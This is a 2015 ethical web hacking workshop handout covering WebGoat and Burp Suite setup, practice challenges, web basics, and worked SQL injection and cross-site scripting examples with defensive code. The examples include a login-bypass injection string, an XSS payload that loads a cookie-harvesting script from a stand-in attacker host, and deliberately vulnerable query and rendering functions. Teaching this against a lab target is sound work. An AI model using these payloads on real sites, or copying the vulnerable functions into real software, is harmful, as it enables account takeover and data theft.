Cyber Security Workshop
Ethical Web Hacking
May 2015

Contents
- Setting up WebGoat and Burp Suite
- Hacking Challenges in WebGoat
- Concepts in Web Technologies and Ethical Hacking
Downloading WebGoat and Burp Suite

System Requirements

Computer and operating system:
- Macintosh (with Intel processor): Mac OS X 10.8 or higher
- Windows: Windows Vista, Windows 7 or Windows 8
- GNU/Linux: Ubuntu 12.04 or higher

Browser: Mozilla Firefox 32 or higher recommended.

Note: If you are using Firefox with the NoScript extension, you'll need to turn the extension off.

Step 1: Install Java Software
Java is required in order to run WebGoat and Burp Suite, which are both Java applications. If Java isn't currently installed on the computer, visit the following link: http://java.com/en/download/help/download_options.xml
Click on the link on that web page that is appropriate for your PC's operating system and follow the instructions to download and install Java.

Step 2: Download Burp Suite Free
Visit http://portswigger.net/burp/downloadfree.html to download the latest version of Burp Suite Free (7.4 MB download).

Step 3: Download WebGoat 6
Visit https://github.com/webgoat/webgoat-legacy/releases and scroll down to download the two WebGoat files, WebGoat-6.0.1-war-exec.jar and WebGoat-6.0.1.war (100 MB download).
Setting up the environment

Step 1: Run WebGoat 6
Double-click on WebGoat-6.0.1-war-exec.jar to start WebGoat in the background. Note that you should not see anything open; WebGoat runs as a background process.

Step 2: Access the WebGoat Page
Open Firefox and connect to http://localhost:8080/webgoat/login.mvc
The WebGoat login page then appears as shown in the screenshot below, and you can log in using the guest or webgoat account.

Step 3: Run Burp Suite Proxy
Double-click on burpsuite_free_v1.6.01.jar to open the Burp Proxy.
Configuring Burp to work with your browser

In this step we will configure your web browser to work with Burp. Burp operates as a man-in-the-middle between your browser and target web applications, so the browser must be pointed at Burp as its proxy before Burp can intercept its traffic.

NOTE: We strongly recommend that you apply these steps to the Firefox web browser. Chrome, Safari and Internet Explorer use the operating system's proxy settings, so modifying the proxy for them may prevent other applications from accessing the internet.

Step 1: Open Firefox with a new blank tab
This is to ensure that we don't get flooded with unwanted requests from other websites when Intercept mode is on.

Step 2: Configure Burp Proxy to listen on port 8081
First, we want to confirm that Burp's proxy listener is active and working. Go to the Proxy tab, then the Options sub-tab, and look in the Proxy Listeners section. You should see an unchecked entry in the table for 127.0.0.1:8080, as seen in the screenshot below.
Since WebGoat is already using port 8080, we need to change the settings so that Burp uses the free port 8081.
Under the Proxy Listeners section, click on the Edit button on the left. Change "Bind to port" to 8081 and click OK.
Then, under the Running column, ensure that the box to the left of 127.0.0.1:8081 is checked, like the screenshot below.
The Burp Proxy has now been configured correctly.
Step 3: Configuring Firefox to work with Burp
In Firefox, go to the Firefox menu. Then click on Tools (or Preferences in older versions). Next, click on the Advanced tab, then select the Network tab. Under the Network tab, click on the Settings button in the Connection section.
Select the "Manual proxy configuration" option. Then enter your Burp Proxy listener address in the HTTP Proxy field (127.0.0.1). Next, enter your Burp Proxy listener port in the Port field (8081). Then ensure that the "Use this proxy server for all protocols" box is checked.
Finally, delete anything that appears in the "No proxy for" field, so that it looks like the screenshot below. Click OK to save the changes. Firefox is now configured to work with Burp.

Reversing the Firefox configuration change
If you no longer want the Burp Proxy to intercept the traffic from Firefox, change the Firefox connection settings from "Manual proxy configuration" to "No proxy". An even easier method is to install the TOGGLEPROXY Firefox add-on, which lets you switch back and forth between the No proxy setting and the Burp Proxy setting with a click of a button.

Using Burp on HTTPS sites
Because the Burp Proxy acts as a man-in-the-middle between your browser and a web application, it terminates the SSL connection to an SSL-protected web application and presents the browser with a certificate signed by Burp's own CA. Therefore, you need to install Burp's CA certificate in the browser to remove the untrusted-certificate warnings. That CA can sign a certificate for any site, so install it only in the browser profile you use for testing. Visit the following link for more information on how to install Burp's CA certificate in Firefox:
https://support.portswigger.net/customer/portal/articles/1783075-Installing_Installing%20CA%20Certificate.html
Tips on how to use the Burp Proxy

Turn Intercept on only when you want to capture or modify HTTP requests
When first using the Burp Proxy, Intercept is on by default. This prevents you from browsing a website normally, as the requests are queued by Burp and have to be manually forwarded by you. If you want to view web pages while using Burp, you must either click the Forward button for each request or turn Intercept off completely. You can turn Intercept off by clicking on the "Intercept is on" button, as in the screenshot below.

You can view the history of all traffic sent and received by your browser in Burp
After you configure your browser to use Burp as a proxy, all traffic that goes in and out of the web browser is recorded in Burp under the Proxy -> HTTP history tab. This happens even if you turn the Intercept function off. It gives you a complete record of the web links that you have visited, as well as the HTML and JavaScript code that your web browser processed.
Challenges in WebGoat

Once you have configured WebGoat and Burp Proxy, you are ready to have a crack at a few WebGoat challenges. The following is a list of recommended starter challenges that will put you in the right mind-set for tackling ethical web hacking problems:

Access Control Flaws -> Stage 1
As regular employee Tom, exploit weak access control to use the Delete function from the Staff List page.

Access Control Flaws -> Stage 3
As regular employee Tom, exploit weak access control to view another employee's profile.

Parameter Tampering -> HTML Field Restrictions
Bypass the HTML form restrictions for all six fields by submitting six invalid values against their parameters.

Authentication Flaws -> Forgotten Password
Retrieve the password of another user by abusing the Password Recovery function.

Parameter Tampering -> Exploit Hidden Fields
Try to purchase the HDTV for less than the purchase price.

Concurrency -> Shopping Cart Concurrency Flaw
Exploit the application's vulnerable handling of multiple HTTP requests to purchase the Sony laptop for a lower price.

Authentication Flaws -> Multi Level Login 1
Trick the web application into logging you in as someone else (Method 1).

Authentication Flaws -> Multi Level Login 2
Trick the web application into logging you in as someone else (Method 2).

Injection Flaws -> Stage 1: String SQL Injection
As regular employee Larry, use SQL injection into a parameter of the View function (from the List Staff page) to view the profile of the boss Neville.

Injection Flaws -> Stage 3: Numeric SQL Injection
Use string SQL injection on the login page to bypass authentication and log in as the boss Neville.

Cross Site Scripting -> Stage 1: Stored XSS
As regular employee Tom, execute a Stored XSS attack against the Street field on the Edit Profile page. Verify that the user Jerry is affected by the attack.

Cross Site Scripting -> Stage 5: Reflected XSS
Execute a Reflected XSS attack by using a vulnerability on the Search Staff page.
Basic Concepts

IP Address
A unique number assigned to your computer connection by your internet service provider (external IP) or your network router (internal IP). It functions a bit like your street address: if someone wants to send you mail, your address is needed for the delivery person to find your home. In the case of your computer, your IP address is used to route information from the internet to your computer.
216.58.220.142 is an example of an IPv4 address.
FE80:0000:0000:0000:0202:B3FF:FE1E:8329 is an example of an IPv6 address.

URL - Uniform Resource Locator
A URL is a standard naming convention used to specify addresses on the internet. An example of a URL, with its parts labelled:

    http://www.unitec.ac.nz/home/index.html

    http://        Protocol
    www            Sub-domain
    unitec.ac.nz   Domain and domain suffix
    /home/         Directory
    index.html     Web page

Web Server
Web servers are computers that deliver web pages. Every web server has an IP address and a domain name. For example, if you type the URL http://www.unitec.ac.nz into your browser, this sends a request to the web server whose domain name is unitec.ac.nz. The server then fetches the page named index.html and sends it to your browser.
HTTP
Stands for HyperText Transfer Protocol. It tells the browser which protocol (or language) it is going to use to access information that is specified on a domain or a server.

SSL
Stands for Secure Sockets Layer, and is one of many security protocols used on the internet. It is a way to encrypt data that is sent between a web browser and the web server so that it cannot be read or tampered with in transit. An SSL connection uses a public key and a private key. The web browser uses the server's public key (delivered in the server's certificate) to encrypt the data, and the web server uses its private key to decrypt the information into something readable. Websites protected with SSL begin with HTTPS (also known as Secure HTTP) rather than HTTP. The more advanced security protocol commonly used today is TLS (Transport Layer Security), the successor to SSL.

Cookie
A cookie is information that a website puts on your hard disk so that it can remember something about you at a later time. Using the HTTP protocol, your web browser makes independent requests for each web page. This means that the web server has no memory of what pages it has sent to a user previously. For example, when you log in to a website such as Facebook, a cookie is created with your unique session ID. Each time you access a page on Facebook, that session ID is passed to the web server in each request so that it knows that you are a legitimate user before returning you a list of your Facebook friends. Anyone who obtains that session ID can present it in their own requests, which is why a session cookie needs the same protection as a password.

Network Port
A network port is a numbered endpoint on a machine through which information is sent and received. Port numbers range from 0 to 65,535, and applications and services on a server listen on a port for incoming packets of data. For example, when you connect to a website, your machine connects to port 80 (for HTTP) or port 443 (for HTTPS) to receive data and display the website.
HTML
Stands for HyperText Markup Language. It is an authoring language used to create documents on the web. HTML documents are described by HTML mark-up tags. An example of HTML code can be seen below:

    <!DOCTYPE html>
    <html>
    <head><title>Unitec Workshop</title></head>
    <body>
    <h1>Cyber Security</h1>
    <p>I am learning about HTML.</p>
    </body>
    </html>

JavaScript
JavaScript is a lightweight programming language (also known as a scripting language) that is interpreted by the web browser's engine when a web page is loaded. It is primarily used for adding interactivity to web pages and is a core part of web applications today. An example of JavaScript code can be seen below (the paragraph with id "demo" is the element the button writes into):

    <p id="demo"></p>
    <button type="button" onclick="document.getElementById('demo').innerHTML = 'Hello Unitec!'">
    Click Me Now</button>

XML
Stands for Extensible Mark-up Language. XML is a set of rules used to describe the content and structure of information. It is a flexible way to create information formats and share this data between applications. An example of XML code can be seen below:

    <?xml version="1.0"?>
    <quiz>
      <question>
        What is the difference between XML and HTML?
      </question>
      <answer>
        XML was designed to describe data and to focus on what the data is.
        HTML was designed to display data and to focus on how the data looks.
      </answer>
    </quiz>
CSS
Stands for Cascading Style Sheets. It defines how HTML elements should be displayed and formatted in a web browser. Using a single external CSS file, you can change the look and feel of an entire website instead of changing the code in every single HTML page. CSS can also be embedded directly inside an HTML document, as in the example below:

    <!DOCTYPE html>
    <html>
    <head>
    <style>
    body {
        background-color: #b0c4de;
    }
    </style>
    </head>
    <body>
    <h1>CSS Heading</h1>
    <p>This is basically HTML code.</p>
    </body>
    </html>

SQL
Stands for Structured Query Language. It is a standard interactive and programming language for getting information from a relational database, as well as making changes or adding entries. A database is a collection of information stored in a file. Examples of relational database systems include MySQL, Oracle, Microsoft Access and FileMaker Pro. These are programs that allow you to store and retrieve data as efficiently as possible.

If we want to create a table to store information from a survey, we can use the following SQL statement:

    CREATE TABLE SURVEY (
        ID INTEGER PRIMARY KEY,
        FIRST_NAME CHAR(20),
        LAST_NAME CHAR(20),
        AGE REAL,
        POST_CODE REAL
    );

If we want to pull the surname of all users who participated in the survey, we can use the following SQL query:

    SELECT LAST_NAME FROM SURVEY;
Ethical Web Hacking Concepts

HTTP Requests
When you type a URL into your web browser, the browser sends an HTTP request to a web server in the form of a request message. The request message includes a Request Method, which tells the web server what kind of action you want to perform. For example, the GET method is used to retrieve information from the server, while the POST method is used to send data to the server (e.g. survey information, file uploads, etc.). HTTP requests also include Request Header Fields, which allow an HTTP client such as your browser to pass additional information about the request, and about the client itself, to the server.

Example 1: Fetch the index.html page from a web server running on unitec.ac.nz

    GET /index.html HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 5.2) Firefox/35.0
    Host: www.unitec.ac.nz:80
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive

Line by line:
GET /index.html HTTP/1.1 - Fetch index.html using version 1.1 of the HTTP protocol.
User-Agent - This request is coming from a Firefox web browser on Windows 8.
Host - The web server that I want to connect to is www.unitec.ac.nz, on port 80.
Accept-Language - My language preference is English (US).
Accept-Encoding - I can accept a response compressed with gzip or deflate, so the page downloads faster.
Connection - Keep the connection between my web browser and the web server open for further requests.
HTTP Requests - Continued

Example 2: Send purchase information to a web server running on buystuff.co.nz

    POST /auction/1243523/ps4?action=buy HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.2) Firefox/35.0
    Host: www.buystuff.co.nz:80
    Referer: http://www.buystuff.co.nz/1243523/ps4
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive

    QTY=1&Submit=BuyNow&Price=469.97

Line by line:
POST /auction/1243523/ps4?action=buy HTTP/1.1 - Web server, process the purchase form data and respond accordingly.
User-Agent - This request is coming from a Firefox web browser on Windows 8.
Host - The web server that I want to connect to is www.buystuff.co.nz, on port 80.
Referer - Here is the address of the previous page that I visited.
Content-Type - The information that I am sending you is simple web form data.
Content-Length - The message body that I am sending you is 32 characters long.
Accept-Language - My language preference is English (US).
Accept-Encoding - I can accept a response compressed with gzip or deflate, so the page downloads faster.
Connection - Keep the connection between my web browser and the web server open for further requests.
QTY=1&Submit=BuyNow&Price=469.97 - I clicked the Buy Now button and want to purchase one PlayStation 4 console for $469.97.

Note that every one of these lines, including the Price in the body, is written by the browser and can be edited in Burp before it is forwarded. This is exactly what the Parameter Tampering challenges rely on, and it is why a server must never trust a price sent by the client.
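The request above, parsed the way a server sees it, as an added example (not code from the handout or from WebGoat): it splits the request line, headers and body, checks the body against Content-Length, and then shows the defence against the Price tampering described in the Exploit Hidden Fields challenge by charging the server-side catalogue price rather than the submitted one. The CATALOGUE dictionary and the checkout logic are constructed for this example.

```python
"""Parse the handout's Example 2 POST request and charge a server-side price.
Added example: the request text is copied from the handout, the catalogue and
checkout logic are constructed here and stand in for a real shop's code."""
from urllib.parse import parse_qs

# Constructed copy of the handout's Example 2 request, with CRLF line endings.
RAW_REQUEST = (
    "POST /auction/1243523/ps4?action=buy HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.2) Firefox/35.0\r\n"
    "Host: www.buystuff.co.nz:80\r\n"
    "Referer: http://www.buystuff.co.nz/1243523/ps4\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 32\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "QTY=1&Submit=BuyNow&Price=469.97"
)

# Hypothetical server-side price list: the only price the shop should honour.
CATALOGUE = {"/auction/1243523/ps4": 469.97}


def parse_request(raw):
    """Split an HTTP/1.1 request into (method, target, headers, body).
    Header names are lower-cased because HTTP treats them case-insensitively.
    A body that does not match the declared Content-Length is rejected rather
    than guessed at, which is what a careful server should do."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = int(headers.get("content-length", len(body.encode())))
    if declared != len(body.encode()):
        raise ValueError("Content-Length does not match body length")
    return method, target, headers, body


def checkout(raw):
    """Return what the server charges for the purchase in `raw`.
    The Price field is just a client-supplied value that can be edited in an
    intercepting proxy, so the catalogue price is charged and a mismatch with
    the submitted price is flagged for logging or rejection."""
    method, target, headers, body = parse_request(raw)
    if method != "POST":
        raise ValueError("checkout requires a POST request")
    path = target.split("?", 1)[0]
    form = parse_qs(body, strict_parsing=True)
    client_price = float(form["Price"][0])
    qty = int(form["QTY"][0])
    server_price = CATALOGUE[path]
    tampered = abs(client_price - server_price) > 0.001
    return {"charged": round(server_price * qty, 2), "tampered": tampered}
```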
HTTP Response
After receiving and interpreting a request message, the web server responds with an HTTP response message. If the initial request was valid, the response includes HTML code that is rendered by the web browser.

Example: Web server response to a request to fetch the index.html page from a web server running on unitec.ac.nz

    HTTP/1.1 200 OK
    Date: Mon, 27 Jul 2015 12:28:53 GMT
    Server: Apache/2.2.14 (Win32)
    Content-Length: 88
    Content-Type: text/html
    Connection: close

    <html>
    <body>
    <h1>Hello, World!</h1>
    </body>
    </html>

Line by line:
HTTP/1.1 200 OK - The request was successfully received, understood and accepted.
Date - This response was sent at this date and time.
Server - The request was processed by the Apache web server software.
Content-Length - The body that you are receiving is 88 characters long.
Content-Type - The body that you are receiving is plain HTML.
Connection - Close the connection between the web browser and the web server after this response.
The body is the HTML code for a simple page with a "Hello, World!" heading.
SQL Injection
SQL injection is one of many injection attacks that hackers use to harvest data from organisations. It is a type of attack that takes advantage of flaws due to improper coding of web applications. Hackers often inject SQL commands into forms to gain access to the data held within your database. Essentially, SQL injection arises because the fields available for user input allow SQL statements to pass through, giving a hacker the ability to communicate directly with the database.

Example: A login page where a legitimate user would type in their username and password combination to view their personal information.
To log in, a user types in their username and password and clicks on the submit button. This transaction generates a SQL query: the web application communicates with the database through a series of planned commands to verify the username and password combination. On verification, the user is granted access. However, a hacker could input specifically crafted SQL commands into the form fields with the intent of bypassing the login form and gaining unauthorised access to information.

[Diagram: the web browser sends a malicious HTTP request to the web server, which passes the injected SQL on to the database]

Malicious HTTP request:

    POST /login.php HTTP/1.1
    Host: buystuff.co.nz:80
    User-Agent: Mozilla/5.0 (Windows NT 6.2) Firefox/35.0
    Referer: http://www.buystuff.co.nz/1243523/ps4

    UserName=admin or 1=1--&Password=admin or 1=1--&Submit=Login

In the example above, the "admin or 1=1--" input turns the SQL query into: if the user admin exists, pull information about admin from the database; or, if the statement 1=1 is true, pull information from each row of the table. Since 1 always equals 1, the condition is true for every row in the table, so information from every row is returned to the user. The "--" starts a SQL comment, so whatever the application appended after the injected text (such as the password check) is ignored by the database.
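The login check above, written two ways as an added example (not code from the handout or from WebGoat): a vulnerable version that pastes the submitted values into the SQL text, and the hardened version that binds them as parameters so the database only ever treats them as data. The user table is constructed in an in-memory SQLite database, and the injected input is the handout's "or 1=1--" string with the quote that closes the username literal.

```python
"""Concatenated versus parameterised login query, run against a constructed
in-memory SQLite table. Added example, not the handout's or WebGoat's code."""
import sqlite3


def make_db():
    """Constructed user table with a single account for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery')")
    return db


def login_concatenated(db, username, password):
    """Vulnerable form: the submitted values become part of the SQL text.
    A quote in the username ends the string literal early and everything that
    follows is parsed by the database as SQL, exactly as the handout describes."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchall()


def login_parameterised(db, username, password):
    """Hardened form: `?` placeholders bind the values as data. The same input
    is only ever compared, character for character, against the username
    column, so the query's structure cannot change."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()


def compare(username, password):
    """Run both checks against a fresh database and return the rows each one
    matched. A non-empty list means the login would have been accepted."""
    db = make_db()
    return {
        "concatenated": login_concatenated(db, username, password),
        "parameterised": login_parameterised(db, username, password),
    }


# The handout's injected input, with the quote that closes the username literal.
INJECTED = "admin' or 1=1--"
```

With INJECTED and a wrong password, the concatenated query matches the admin row (the password clause has been commented out) while the parameterised query matches nothing; the real credentials are accepted by both.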
Cross-Site Scripting
Cross-site scripting is one of many injection attacks that hackers use to harvest information from users by targeting vulnerable web sites. It is a type of attack that takes advantage of improper coding of web applications. Cross-site scripting enables attackers to inject client-side script into web pages viewed by other users. This vulnerability can allow a hacker to harvest information from cookies and bypass access controls. This means a hacker can log in as another user without knowing their username and password.

Example: Exploiting a cross-site scripting vulnerability on a shopping site
1) A malicious user injects a script into a legitimate shopping site URL. This then redirects a user to a fake but identical page.
2) The fake page executes a script that reads the cookie of the user browsing the shopping site and sends that information to the malicious user. Since the cookie contains the identifier of an active login session, the malicious user can now hijack the legitimate user's session.

[Diagram: the web browser sends a malicious HTTP request to the web server, whose response reflects the injected script back to a victim's browser]

Malicious HTTP request:

    POST /login.php HTTP/1.1
    Host: buystuff.co.nz
    User-Agent: Mozilla/5.0 (Windows NT 6.2) Firefox/35.0
    Referer: http://www.buystuff.co.nz/1243523/ps4

    UserName=<script src=http://hack.er/harvest_session.js></script>&password=&submit=login

In general, cross-site scripting is not considered an attack against the website itself; it exploits a scripting weakness in the page to take control of a user's session. Users can be lured by URLs in a phishing email that contain code to exploit a cross-site scripting vulnerability. The application's defence is to encode user-supplied values before writing them into a page, so the browser displays them as text rather than running them, and to mark session cookies so that page scripts cannot read them.
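The two server-side defences named above, as an added example (not code from the handout or from WebGoat): rendering the submitted UserName with HTML encoding so the injected tag is shown as text, and issuing the session cookie with HttpOnly (plus Secure and SameSite) so a script that does run cannot read it. The greeting template, the cookie name SESSIONID and the attacker.example script URL are constructed for this example; html.escape and http.cookies are Python standard library modules.

```python
"""Output encoding and HttpOnly session cookies against the handout's XSS
example. Added example, not the handout's or WebGoat's code."""
import html
from http.cookies import SimpleCookie

# Constructed stand-in for the handout's injected UserName value.
INJECTED_NAME = '<script src="http://attacker.example/harvest_session.js"></script>'


def render_greeting_unsafe(username):
    """Vulnerable: reflects the submitted value verbatim into the page, so the
    browser parses any tags it contains and loads the attacker's script."""
    return "<p>Welcome back, " + username + "</p>"


def render_greeting(username):
    """Hardened: HTML-encodes the value before it reaches the page. The
    characters < > & " ' become entities (&lt; &gt; &amp; &quot; &#x27;),
    so the text can no longer open a tag or break out of an attribute."""
    return "<p>Welcome back, " + html.escape(username, quote=True) + "</p>"


def session_cookie_header(session_id):
    """Build the Set-Cookie header for a session ID.
    HttpOnly keeps the cookie out of reach of document.cookie, which is the
    harvesting step in the handout's example; Secure limits it to HTTPS;
    SameSite=Strict stops the browser attaching it to cross-site requests."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = session_id
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["secure"] = True
    cookie["SESSIONID"]["samesite"] = "Strict"
    return cookie.output(header="Set-Cookie:")
```

Encoding does not remove the attacker's text, it neutralises it: the escaped page still shows the literal characters of the script tag, but the browser treats them as content, not markup.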